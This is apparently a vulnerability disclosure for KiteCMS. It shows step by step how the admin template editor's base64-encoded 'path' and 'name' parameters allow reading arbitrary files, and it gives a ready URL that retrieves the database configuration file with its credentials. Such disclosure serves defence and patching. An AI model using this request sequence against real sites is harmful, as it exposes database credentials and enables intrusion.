vendor: https://github.com/Kitesky/KiteCMS
Vulnerability Position:ip/index.php/admin/template/filelist.html
Log in to the backend:
Visit http://ip/index.php/admin/template/filelist.html , Will access the page of the module
Click to edit,It jumps to another page ---> http://192.168.1.128/index.php/admin/template/fileedit.html?path=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3RoZW1lL2NvbXBhbnkvYmFzZS5odG1s&name=YmFzZS5odG1s
and we find that the path and name parameters are encrypted by base64 by reporting an error.
http://192.168.1.128/index.php/admin/template/fileedit.html?path=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3RoZW1lL2NvbXBhbnkvYmFzZS5odG1s&name=YmFzZS5odG1s
path=RDovcGhwU3R1ZHkvUEhQVHV0b3JpYWwvV1dXL3RoZW1lL2NvbXBhbnkvYmFzZS5odG1s---> D:/phpStudy/PHPTutorial/WWW/theme/company/base.html
name=YmFzZS5odG1s --->base.html
We found the warehouse of the cms in github and inferred the local path of the database file configuration of the cms
The local path to the database file configuration of the cms: D:\phpStudy\PHPTutorial\WWW\config\database.php
We encode the path with base64 ---> RDpccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXGNvbmZpZ1xkYXRhYmFzZS5waHA=
Then splice the transcoded path to the url: http://ip/index.php/admin/template/fileedit.html?path=RDpccGhwU3R1ZHlcUEhQVHV0b3JpYWxcV1dXXGNvbmZpZ1xkYXRhYmFzZS5waHA=&name=ZGF0YWJhc2UucGhw
Access found that the database configuration file of the cms was successfully read.
